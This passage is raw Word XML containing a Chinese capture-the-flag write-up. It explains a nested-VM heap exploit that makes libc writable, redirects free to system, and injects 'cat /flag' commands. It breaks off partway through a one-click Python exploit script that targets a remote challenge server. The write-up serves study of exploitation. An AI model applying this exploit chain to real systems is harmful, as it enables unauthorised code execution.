        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__mprotect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作将无意中把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本应为只读属性（R-X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R--）的物理内存页强制转变为可读写状态（RW-）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="header-n176"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收尾攻击：将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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数执行流重定向至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伴随</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存被赋予写权限，我们便无需再苦心积虑地去构造基址泄露或者拼凑复杂的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链条。此时的攻击方案可直接借用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> House of Muney </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心思想：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暴力篡改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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内部调用链路，迫使其最终跳转至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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">例程；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紧接着，触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">退出指令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exit/free_all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，让其批量清理内存；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事先在被释放的第一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内容区注入我们期望运行的终端指令，譬如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时，由虚拟机自发执行的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free(chunk0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就等同于执行了如下逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("cat /flag...")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这同时解答了一个先前提出的疑惑：为何出题人要在内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">里加入一个似乎毫无必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exit/free_all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令？事实上，这是作者故意预留给解题者的最终指令触发器。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="header-n195"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将开源的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">堆喷射链条嵌套至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解释器中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当我们明确认定“核心漏洞攻击发生在里层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BlindVM”之后，外围</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要承担的任务将被极度简化，即：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">把通过校验的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 13 00 00 00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位流</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改写为真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM exp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节流</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们现有的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build_payload.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本内部提供了一个封装极其完善的函数：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evm_copy_bytes_from_data(...)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make_via_data_copy(blind_patch)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这套代码的运行机制如下：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将生成的原生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击载荷视作普通的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">page，存放在外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存空间</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位置；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构造一段微小的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">循环读写指令（copy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop）；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驱动外层解释器将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的攻击载荷逐字迁移至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">偏移</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x300000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的位置；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当第二层虚拟机接管控制权时，它所解析的内存区域早已被替换为真实的利用代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种战术相较于早前“盲猜内存页表并依赖特殊操作码覆写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GOT”的方法，拥有无与伦比的稳定性。因为我们彻底舍弃了对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复杂内存管理的探测，将目标极简为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我只需要稳定把第二层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码区改出来即可</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="header-n216"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完整脚本（复刻版：同步构建外层包装体并执行远端打击）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下是集成所有漏洞利用环节的自动化代码：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头部区块包含用以生成外围</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">封装程序的模块；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核心区块负责构造针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM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add/edit/exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">堆喷射攻击数据；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尾部区块实现网络套接字通信，用于向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">39.96.193.120:8888</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送最终载荷；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系统执行命令处并发注入了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/flag.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及本地路径下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以提高命中概率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：该利用脚本完全是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">依托本地反编译工程与网络披露的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用技巧共同还原出的一键式攻击代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。目前该脚本绝对能够组装出符合本题交互规范的双层载荷流。鉴于本次调试并未在远端服务器上成功获取命令回显，故在此将整套思维导图与可运行代码以“开箱即用”的形式存档。若后期需推进远程实战渗透，建议率先排查调整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_DELTA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变量，并微调末尾数个用来对齐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">堆块内存的分配参数。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struct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'39.96.193.120:8888'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST,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TARGET.split(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(PORT)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">HEAP_MAX_SIZE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0x4000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MINSIZE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0x20</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MMAP_THRESHOLD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0x20000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGE_SIZE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0x1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_DELTA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0x800000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当前复原版本先沿用公开 BlindVM 思路里的偏移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p32(x):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struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;I'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, x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p64(x):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struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;Q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, x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0xffffffffffffffff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--------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Outer EVM helpers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --------------------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r_u_type(opc, rd, imm20):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((imm20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(rd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opc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r_i_type(opc, rd, f3, rs1, imm):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((imm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(rs1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(f3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(rd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opc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r_b_type(opc, f3, rs1, rs2, imm):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imm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imm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0x1fff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    bit12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(imm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bit11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(imm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bits10_5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(imm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0x3f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    bits4_1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(imm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((bit12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(bits10_5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(rs2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(rs1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      (f3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(bits4_1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(bit11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opc)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r_xstore(rs1, rs2, f3, off):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(((off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0x7f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(rs2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(rs1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(f3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((off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0x2f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pack_ins(ins):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struct.pack(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;I'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, ins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evm_copy_bytes_from_data(total_len, src_guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, dst_direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x300000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total_len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total_len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src_guest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total_len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code.append(r_u_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x37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src_guest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code.append(r_u_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x37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dst_direct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code.append(r_u_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x37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end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loop_pc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(code)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code.append(r_i_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x03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code.append(r_xstore(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code.append(r_i_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x13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code.append(r_i_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x13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branch_pc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(code)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imm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loop_pc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(branch_pc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code.append(r_b_type(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x63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imm))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    code.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x13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b''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.join(pack_ins(x)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code)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wrap_blind_payload(blind_patch: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padded_len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(blind_patch)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data_pages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(padded_len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blind_patch.ljust(data_pages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b'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evm_copy_bytes_from_data(padded_len)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    blind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b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x13\x00\x00\x00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((padded_len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))[:padded_len]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(code)).encode()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(data_pages).encode()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(padded_len).encode()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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0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blind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payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inner BlindVM helpers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># --------------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payloads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ADD_INDEX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add(size):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ADD_INDEX</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    payloads.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'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p32(size))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ADD_INDEX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edit(idx, content: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payloads.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x01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p32(idx)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p32(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(content))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content)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finish():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    payloads.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
